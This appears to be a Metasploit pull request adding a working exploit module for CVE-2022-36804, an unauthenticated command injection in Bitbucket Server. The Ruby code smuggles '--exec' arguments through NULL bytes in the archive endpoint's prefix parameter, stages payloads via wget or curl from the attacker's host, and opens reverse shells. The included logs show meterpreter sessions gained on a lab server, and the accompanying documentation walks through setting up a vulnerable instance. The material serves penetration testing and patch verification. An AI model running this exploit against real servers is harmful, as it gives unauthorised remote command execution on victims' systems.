### PR TITLE
Add exploit for CVE-2022-36804

### DIFF
--- a/documentation/modules/exploit/linux/http/bitbucket_git_cmd_injection.md
+++ b/documentation/modules/exploit/linux/http/bitbucket_git_cmd_injection.md
@@ -1,0 +1,118 @@
+## Vulnerable Application
+
+Various versions of Bitbucket Server and Data Center are vulnerable to
+an unauthenticated command injection vulnerability in multiple API endpoints.
+
+The `/rest/api/latest/projects/{projectKey}/repos/{repositorySlug}/archive` endpoint
+creates an archive of the repository, leveraging the `git-archive` command to do so.
+Supplying NULL bytes to the request enables the passing of additional arguments to the
+command, ultimately enabling execution of arbitrary commands.
+
+According to the [advisory](https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html), vulnerable versions of Bitbucket are:
+
+  Any version released after version `6.10.17` and before:
+          * `7.6.17`
+          * `7.17.10`
+          * `7.21.4`
+          * `8.0.3`
+          * `8.1.3`
+          * `8.2.2`
+          * `8.3.1`
+
+Download archives can be found [here](https://www.atlassian.com/software/bitbucket/download-archives).
+    
+### Installation Instructions
+
+1. Install Git on the target machine
+  * sudo apt install -y git
+2. Download a vulnerable version of Bitbucket. For example, version `8.2.1` can be found
+[here](https://www.atlassian.com/software/stash/downloads/binary/atlassian-bitbucket-8.2.1-x64.bin)
+3. Make sure the resulting bin file is executable and run it
+  * chmod +x atlassian-bitbucket-8.3.0-x64.bin && sudo ./atlassian-bitbucket-8.3.0-x64.bin
+4. An installation wizard will pop up. Make sure `Install a new instance` is checked, then click `Next`
+5. Check `Install a Server instance` and click `Next`
+6. If the default destination directory looks good, click `Next`
+7. Click `Next` if the default Bitbucket data directory looks fine
+8. Make sure the `Use default HTTP port (7990)` selection is checked and click `Next`
+9. Make sure the `Install Bitbucket as a service` box is checked and click `Next`
+10. Click `Install` if everything looks correct on the summary screen
+11. Once the installation completes, make sure the `Would you like to launch Bitbucket` option is selected
+and click `Next`
+12. Ensure `Launch Bitbucket <version> in browser` is selected and click `Finish`
+13. Navigate to the Bitbucket setup page (http://localhost:7990) and select the `I need an evaluation license` option
+14. If you already have an account, select `I have an account`; otherwise, create a new account
+15. 'up and running' should be selected on the next page, so click `Generate License`
+16. Confirm that the prompt gives you the correct server, then click `Yes`
+17. The license should be entered in the box, so select `Next`
+18. Finally, set up an administrator account
+
+*Note*: If an error occurs on the last step, just open a browser and navigate to the setup
+page at 127.0.0.1:7990
+
+### Vulnerable Setup
+
+1. Log into Bitbucket with your administrator credentials
+2. Once logged in, select `Projects` at the top menu
+3. Select `Create project`
+4. Enter a name for the project and click `Create project`
+5. On the next page, select `Create repository`
+6. Enter a name for the repository and select `Create repository`
+7. Follow the instructions to clone the repository and push data to the repository so it is not empty
+8. Click the gear on the left side of the next page
+9. Select `Repository permissions` under `Security` on the left
+10. Underneath `Public access`, check `Enable` to make the repository public
+
+Bitbucket should now be exploitable
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/bitbucket_git_cmd_injection`
+4. Do: `run`
+5. You should get a shell.
+
+## Options
+
+### USERNAME
+
+An optional username to authenticate to Bitbucket with
+
+### PASSWORD
+
+An optional password to authenticate to Bitbucket with
+
+### Bitbucket version 8.2.1 on Ubuntu 22.04
+
+```
+msf6 > use exploit/linux/http/bitbucket_git_cmd_injection
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/bitbucket_git_cmd_injection) > set rhost 192.168.140.216
+rhost => 192.168.140.216
+msf6 exploit(linux/http/bitbucket_git_cmd_injection) > set lhost 192.168.140.1
+lhost => 192.168.140.1
+msf6 exploit(linux/http/bitbucket_git_cmd_injection) > run
+
+[*] Started reverse TCP handler on 192.168.140.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Searching Bitbucket for publicly accessible repository
+[+] Found public repo 'repo_name' in project 'TEST'!
+[*] Using URL: http://192.168.140.1:8080/7SGXRWRlXr8t
+[*] Client 192.168.140.216 (Wget/1.21.2) requested /7SGXRWRlXr8t
+[*] Sending payload to 192.168.140.216 (Wget/1.21.2)
+[*] Sending stage (3020772 bytes) to 192.168.140.216
+[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.216:57994) at 2022-09-20 18:40:27 -0500
+[*] Command Stager progress - 100.00% done (118/118 bytes)
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: atlbitbucket
+meterpreter > sysinfo
+Computer     : 192.168.140.216
+OS           : Ubuntu 22.04 (Linux 5.15.0-48-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```

--- a/modules/exploits/linux/http/bitbucket_git_cmd_injection.rb
+++ b/modules/exploits/linux/http/bitbucket_git_cmd_injection.rb
@@ -47,7 +47,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'Platform' => 'linux',
               'Type' => :linux_dropper,
               'Arch' => [ ARCH_X86, ARCH_X64 ],
-              'CmdStagerFlavor' => 'wget',
+              'CmdStagerFlavor' => %w[wget curl bourne],
               'DefaultOptions' => { 'Payload' => 'linux/x64/meterpreter/reverse_tcp' }
             }
           ],
@@ -57,6 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'Platform' => 'unix',
               'Type' => :unix_cmd,
               'Arch' => ARCH_CMD,
+              'Payload' => { 'BadChars' => %(:/?#[]@) },
               'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse_bash' }
             }
           ]
@@ -241,7 +242,7 @@ class MetasploitModule < Msf::Exploit::Remote
     find_public_repo
 
     if target['Type'] == :linux_dropper
-      execute_cmdstager
+      execute_cmdstager(linemax: 6000)
     else
       execute_command(payload.encoded)
     end

--- a/modules/exploits/linux/http/bitbucket_git_cmd_injection.rb
+++ b/modules/exploits/linux/http/bitbucket_git_cmd_injection.rb
@@ -4,7 +4,7 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Remote
-  Rank = NormalRanking
+  Rank = ExcellentRanking
 
   prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
@@ -27,28 +27,39 @@ class MetasploitModule < Msf::Exploit::Remote
         'References' => [
           [ 'URL', 'https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html' ],
           [ 'URL', 'https://attackerkb.com/topics/iJIxJ6JUow/cve-2022-36804/rapid7-analysis' ],
+          [ 'URL', 'https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/' ],
           [ 'CVE', '2022-36804' ]
         ],
         'Platform' => [ 'linux' ],
         'Privileged' => false,
-        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],
         'Targets' => [
           [
-            'Automatic Target',
+            'Linux Dropper',
             {
               'Platform' => 'linux',
+              'Type' => :linux_dropper,
               'Arch' => [ ARCH_X86, ARCH_X64 ],
               'CmdStagerFlavor' => 'wget',
               'DefaultOptions' => { 'Payload' => 'linux/x64/meterpreter/reverse_tcp' }
+            }
+          ],
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Type' => :unix_cmd,
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse_bash' }
             }
           ]
         ],
         'DisclosureDate' => '2022-08-24',
         'DefaultTarget' => 0,
         'Notes' => {
-          'Stability' => [],
-          'Reliability' => [],
-          'SideEffects' => []
+          'Stability' => [ CRASH_SAFE ],
+          'Reliability' => [ IOC_IN_LOGS ],
+          'SideEffects' => [ REPEATABLE_SESSION ]
         }
       )
     )
@@ -56,7 +67,9 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(7990),
-        OptString.new('TARGETURI', [ true, 'The base URI of Bitbucket application', '/'])
+        OptString.new('TARGETURI', [ true, 'The base URI of Bitbucket application', '/']),
+        OptString.new('USERNAME', [ false, 'The username to authenticate with', '' ]),
+        OptString.new('PASSWORD', [ false, 'The password to authenticate with', '' ])
       ]
     )
   end
@@ -64,6 +77,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     res = send_request_cgi(
       'method' => 'GET',
+      'keep_cookies' => true,
       'uri' => normalize_uri(target_uri.path, 'login')
     )
 
@@ -115,11 +129,58 @@ class MetasploitModule < Msf::Exploit::Remote
     CheckCode::Detected
   end
 
+  def username
+    datastore['USERNAME']
+  end
+
+  def password
+    datastore['PASSWORD']
+  end
+
+  def authenticate
+    print_status("Attempting to authenticate with user '#{username}' and password '#{password}'")
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'login'),
+      'keep_cookies' => true
+    )
+
+    fail_with(Failure::UnexpectedReply, 'Failed to reach login page') unless res&.body&.include?('login')
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'j_atl_security_check'),
+      'keep_cookies' => true,
+      'vars_post' =>
+      {
+        'j_username' => username,
+        'j_password' => password,
+        'submit' => 'Log in'
+      }
+    )
+
+    fail_with(Failure::UnexpectedReply, 'Failed to retrieve a response from log in attempt') unless res
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'dashboard'),
+      'keep_cookies' => true
+    )
+
+    fail_with(Failure::UnexpectedReply, 'Failed to receive a response from the dashboard') unless res
+
+    unless res.body.include?('Your work') && res.body.include?('Projects')
+      fail_with(Failure::BadConfig, 'Login failed...Credentials may be invalid')
+    end
+
+    @authenticated = true
+    print_good('Successfully logged into Bitbucket!')
+  end
+
   def find_public_repo
     print_status('Searching Bitbucket for publicly accessible repository')
     res = send_request_cgi(
       'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'rest/api/latest/repos')
+      'uri' => normalize_uri(target_uri.path, 'rest/api/latest/repos'),
+      'keep_cookies' => true
     )
 
     fail_with(Failure::Disconnected, 'Did not receive a response') unless res
@@ -130,11 +191,23 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::NotFound, 'Bitbucket instance has no publicly available repositories')
     end
 
-    json_data = json_data['values']&.first
-    project = json_data['project']
-    fail_with(Failure::NotFound, 'Project not found') unless project
-    @project = project['key']
-    @repo = json_data['name']
+    # opt for public repos unless none exist.
+    # Attempt to use a private repo if so
+    repos = json_data['values']
+    possible_repos = repos.select { |repo| repo['public'] == true }
+    if possible_repos.empty? && @authenticated
+      possible_repos = repos.select { |repo| repo['public'] == false }
+    end
+
+    fail_with(Failure::NotFound, 'There doesn\'t appear to be any repos to use') if possible_repos.empty?
+    possible_repos.each do |repo|
+      project = repo['project']
+      next unless project
+
+      @project = project['key']
+      @repo = repo['slug']
+      break if @project && @repo
+    end
 
     fail_with(Failure::NotFound, 'Failed to find a repo to use for exploit') unless @project && @repo
     print_good("Found public repo '#{@repo}' in project '#{@project}'!")
@@ -145,6 +218,7 @@ class MetasploitModule < Msf::Exploit::Remote
     send_request_cgi(
       'method' => 'GET',
       'uri' => uri,
+      'keep_cookies' => true,
       'vars_get' =>
       {
         'format' => 'zip',
@@ -155,7 +229,14 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
+    @authenticated = false
+    authenticate unless username.blank? && password.blank?
     find_public_repo
-    execute_cmdstager
+
+    if target['Type'] == :linux_dropper
+      execute_cmdstager
+    else
+      execute_command(payload.encoded)
+    end
   end
 end

--- a/modules/exploits/linux/http/bitbucket_git_cmd_injection.rb
+++ b/modules/exploits/linux/http/bitbucket_git_cmd_injection.rb
@@ -16,6 +16,13 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Bitbucket Git Command Injection',
         'Description' => %q{
+          Various versions of Bitbucket Server and Data Center are vulnerable to
+          an unauthenticated command injection vulnerability in multiple API endpoints.
+
+          The `/rest/api/latest/projects/{projectKey}/repos/{repositorySlug}/archive` endpoint
+          creates an archive of the repository, leveraging the `git-archive` command to do so.
+          Supplying NULL bytes to the request enables the passing of additional arguments to the
+          command, ultimately enabling execution of arbitrary commands.
         },
         'License' => MSF_LICENSE,
         'Author' => [

--- a/modules/exploits/linux/http/bitbucket_git_cmd_injection.rb
+++ b/modules/exploits/linux/http/bitbucket_git_cmd_injection.rb
@@ -8,6 +8,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(
@@ -20,17 +21,27 @@ class MetasploitModule < Msf::Exploit::Remote
         'Author' => [
           'TheGrandPew', # discovery
           'Ron Bowes', # analysis and PoC
+          'Jang', # testanull - PoC
           'Shelby Pace' # Metasploit module
         ],
         'References' => [
-          [ 'URL', 'https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html'],
-          [ 'CVE', '2022-36804']
+          [ 'URL', 'https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html' ],
+          [ 'URL', 'https://attackerkb.com/topics/iJIxJ6JUow/cve-2022-36804/rapid7-analysis' ],
+          [ 'CVE', '2022-36804' ]
         ],
-        'Platform' => ['linux'],
+        'Platform' => [ 'linux' ],
         'Privileged' => false,
         'Arch' => [ ARCH_X86, ARCH_X64 ],
         'Targets' => [
-          [ 'Automatic Target', {}]
+          [
+            'Automatic Target',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ ARCH_X86, ARCH_X64 ],
+              'CmdStagerFlavor' => 'wget',
+              'DefaultOptions' => { 'Payload' => 'linux/x64/meterpreter/reverse_tcp' }
+            }
+          ]
         ],
         'DisclosureDate' => '2022-08-24',
         'DefaultTarget' => 0,
@@ -123,15 +134,28 @@ class MetasploitModule < Msf::Exploit::Remote
     project = json_data['project']
     fail_with(Failure::NotFound, 'Project not found') unless project
     @project = project['key']
-    @repo = project['name']
+    @repo = json_data['name']
 
     fail_with(Failure::NotFound, 'Failed to find a repo to use for exploit') unless @project && @repo
-    print_good("Found public repo #{@repo} in project #{@project}!")
+    print_good("Found public repo '#{@repo}' in project '#{@project}'!")
   end
 
-  def get_commits_for_req; end
+  def execute_command(cmd, _opts = {})
+    uri = normalize_uri(target_uri.path, 'rest/api/latest/projects', @project, 'repos', @repo, 'archive')
+    send_request_cgi(
+      'method' => 'GET',
+      'uri' => uri,
+      'vars_get' =>
+      {
+        'format' => 'zip',
+        'path' => Rex::Text.rand_text_alpha(2..5),
+        'prefix' => "#{Rex::Text.rand_text_alpha(1..3)}\x00--exec=`#{cmd}`\x00--remote=#{Rex::Text.rand_text_alpha(3..8)}"
+      }
+    )
+  end
 
   def exploit
     find_public_repo
+    execute_cmdstager
   end
 end

--- a/modules/exploits/linux/http/bitbucket_git_cmd_injection.rb
+++ b/modules/exploits/linux/http/bitbucket_git_cmd_injection.rb
@@ -1,0 +1,137 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Bitbucket Git Command Injection',
+        'Description' => %q{
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'TheGrandPew', # discovery
+          'Ron Bowes', # analysis and PoC
+          'Shelby Pace' # Metasploit module
+        ],
+        'References' => [
+          [ 'URL', 'https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html'],
+          [ 'CVE', '2022-36804']
+        ],
+        'Platform' => ['linux'],
+        'Privileged' => false,
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'Targets' => [
+          [ 'Automatic Target', {}]
+        ],
+        'DisclosureDate' => '2022-08-24',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(7990),
+        OptString.new('TARGETURI', [ true, 'The base URI of Bitbucket application', '/'])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'login')
+    )
+
+    return CheckCode::Unknown('Failed to receive response from application') unless res
+
+    unless res.body.include?('Bitbucket')
+      return CheckCode::Safe('Target does not appear to be Bitbucket')
+    end
+
+    footer = res.get_html_document&.at('footer')
+    return CheckCode::Detected('Cannot determine version of Bitbucket') unless footer
+
+    version_str = footer.at('span')&.children&.text
+    return CheckCode::Detected('Cannot find version string in footer') unless version_str
+
+    matches = version_str.match(/v(\d+\.\d+\.\d+)/)
+    return CheckCode::Detected('Version unknown') unless matches && matches.length > 1
+
+    version_str = matches[1]
+    vprint_status("Found Bitbucket version: #{matches[1]}")
+
+    num_vers = Rex::Version.new(version_str)
+    return CheckCode::NotVulnerable if num_vers <= Rex::Version.new('6.10.17')
+
+    major, minor, revision = version_str.split('.')
+    case major
+    when '6'
+      return CheckCode::Appears
+    when '7'
+      case minor
+      when '6'
+        return CheckCode::Appears if revision.to_i < 17
+      when '17'
+        return CheckCode::Appears if revision.to_i < 10
+      when '21'
+        return CheckCode::Appears if revision.to_i < 4
+      end
+    when '8'
+      case minor
+      when '0', '1'
+        return CheckCode::Appears if revision.to_i < 3
+      when '2'
+        return CheckCode::Appears if revision.to_i < 2
+      when '3'
+        return CheckCode::Appears if revision.to_i < 1
+      end
+    end
+
+    CheckCode::Detected
+  end
+
+  def find_public_repo
+    print_status('Searching Bitbucket for publicly accessible repository')
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'rest/api/latest/repos')
+    )
+
+    fail_with(Failure::Disconnected, 'Did not receive a response') unless res
+    json_data = JSON.parse(res.body)
+    fail_with(Failure::UnexpectedReply, 'Response had no JSON') unless json_data
+
+    unless json_data['size'] > 0
+      fail_with(Failure::NotFound, 'Bitbucket instance has no publicly available repositories')
+    end
+
+    json_data = json_data['values']&.first
+    project = json_data['project']
+    fail_with(Failure::NotFound, 'Project not found') unless project
+    @project = project['key']
+    @repo = project['name']
+
+    fail_with(Failure::NotFound, 'Failed to find a repo to use for exploit') unless @project && @repo
+    print_good("Found public repo #{@repo} in project #{@project}!")
+  end
+
+  def get_commits_for_req; end
+
+  def exploit
+    find_public_repo
+  end
+end


### PR DESCRIPTION
## Description

Various versions of Bitbucket Server and Data Center are vulnerable to an unauthenticated command injection in multiple API endpoints. Successful exploitation requires access to a public repository. Supplying NULL bytes to the git command used at vulnerable endpoints allows the passage of extra arguments to the command, enabling command injection.

## Verification

- [ ] Install the application
- [ ]  Start msfconsole
- [ ] Do: use exploit/linux/http/bitbucket_git_cmd_injection
- [ ] Do: set RHOST ip
- [ ] Do: run
- [ ] You should get a meterpreter session with the privileges of the `atlbitbucket` user

## Scenarios

```
msf6 > use exploit/linux/http/bitbucket_git_cmd_injection 
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/bitbucket_git_cmd_injection) > set rhost 192.168.140.214
rhost => 192.168.140.214
msf6 exploit(linux/http/bitbucket_git_cmd_injection) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(linux/http/bitbucket_git_cmd_injection) > run

[*] Started reverse TCP handler on 192.168.140.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Searching Bitbucket for publicly accessible repository
[+] Found public repo 'my_repo' in project 'TEST'!
[*] Using URL: http://192.168.140.1:8080/56QAUy
[*] Client 192.168.140.214 (Wget/1.21.2) requested /56QAUy
[*] Sending payload to 192.168.140.214 (Wget/1.21.2)
[*] Sending stage (3020772 bytes) to 192.168.140.214
[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.214:41588) at 2022-09-20 10:41:51 -0500
[*] Command Stager progress - 100.00% done (112/112 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: atlbitbucket
meterpreter > sysinfo
Computer     : 192.168.140.214
OS           : Ubuntu 22.04 (Linux 5.15.0-47-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```